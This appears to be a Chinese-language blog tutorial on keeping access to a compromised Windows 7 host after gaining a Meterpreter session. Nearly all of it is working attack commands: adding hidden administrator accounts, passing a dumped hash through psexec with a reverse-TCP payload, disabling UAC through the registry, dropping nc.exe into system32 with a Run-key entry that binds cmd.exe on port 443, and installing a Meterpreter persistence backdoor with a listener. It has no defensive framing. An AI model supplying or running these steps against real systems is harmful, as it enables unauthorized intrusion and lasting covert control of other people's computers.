我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令
创建文本,并向里出入内容,并打开:
echo "hello I am hacker" >>1.txt
之后再打开:notepad 1.txt即可
拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号
方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrators权限
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456
方法二:通过shell进入靶机,在靶机里创建账号
meterpreter > shell
C:\Windows\system32>net user test1 123456 /add
C:\Windows\system32>net localgroup administrators test1 /add
C:\Windows\system32>net user test1
通过创建用户,添加到administrators用户组,创建出来的用户账号也是administrators权限。
[email protected]:~# rdesktop 192.168.72.128
这样就可以远程登录了
第二种:SAM值登录
要注意以下几点:
1.获取SAM密码
2.关闭windows的UAC
3.psexec模块连接登录
一:hashdump获取密码
2.关闭UAC
关闭UAC需要重启才生效
关闭UAC方式一:
链接:link
http://www.win7zhijia.cn/jiaocheng/win7_26850.html
关闭UAC方式二:
meterpreter > shell
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t
REG_DWORD /d 0 /f
参数说明
ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值
3.psexec模块连接登录
msf5 exploit(windows/smb/webexec) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set lhost 192.168.72.131
lhost => 192.168.72.131
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.72.128
rhosts => 192.168.72.128
msf5 exploit(windows/smb/psexec) > set smbuser test
smbuser => test
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
smbpass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf5 exploit(windows/smb/psexec) > set smbdomain workgroup
smbdomain => workgroup
msf5 exploit(windows/smb/psexec) > run
四留后门:
1.关闭UAC(以上已关闭)
2.开启win7主机默认共享,以便于远程执行命令。
3.上传瑞士军刀nc.exe到windows主机上。
4.将nc添加到开机启动项
5.开启windows443端口
6.重启,测试后门。
1.关闭UAC,以上步骤已做
2.开启win7主机默认共享
C:\Windows\system32> cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v
LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
3.上传nc.exe到windows中
注:kali中集成了nc.exe,默认在/usr/share/windows-binaries/nc.exe下。上传到system32是便于隐藏。如果win7是64位的,那么你上传到system32的文件回默认被转到syswow64文件夹中区。但这不影响。
————————————————
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
4.将nc添加至启动项
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
5.开放win7 443端口
C:\Windows\system32> netsh firewall add portopening TCP 443 "xuegod443" ENABLE
6.重启win7并测试后门
强制重启
C:\Windows\system32>shutdown -r -f -t 0
测试后门
[email protected]:~# nc -v 192.168.72.128 443
meterpreter持久后门
背景:meterpreter好是好,但有个大问题,只要目标和本机连接断开一次后就再也连不上了,需要再次用exploit打才行!!!
解决方案:在与目标设备的meterpreter会话中创建一个持久后门(此后门将重新生成一个木马文件,并且该文件将周期性向服务端发送TCP请求)
具体步骤:
meterpreter > run persistence -U -i 5 -p 123 -r 192.168.1.71 =====>创建持久性后门
-A 自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动该木马(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动该木马
-X 系统引导时自动启动该木马
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP
此时就可以放心的断开与目标设备的session了,目标设备将周期性的向本机发送TCP请求,下次想连接此设备时只需做以下操作:
msfconsole
msf>use exploit/multi/handler ====>“handler”这个模块专门就是来做被动监听的,诱使目标执行任何木马后都可以用这个模块进行连接。(假如目标设备运行的meterpreter/reverse_tcp这个木马,则在服务端handler也set这个木马为payload即可)
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.1.71
msf>set LPORT 123
msf>set exitonsession false ===>这个如果不设置为false的话,只要建立了一个session后就不再继续监听,想要再连接其他session需要再次run。反之,如果设为false,建立了一个session后还会继续监听,无需run即可建立多个session。
msf>set AutoRunScript migrate -N explorer.exe ===>一般模块都有AutoRunScript参数(需show advanced查看),此参数作用是:建立连接后自动执行后面的命令,此处即“migrate -N explorer.exe”
msf>run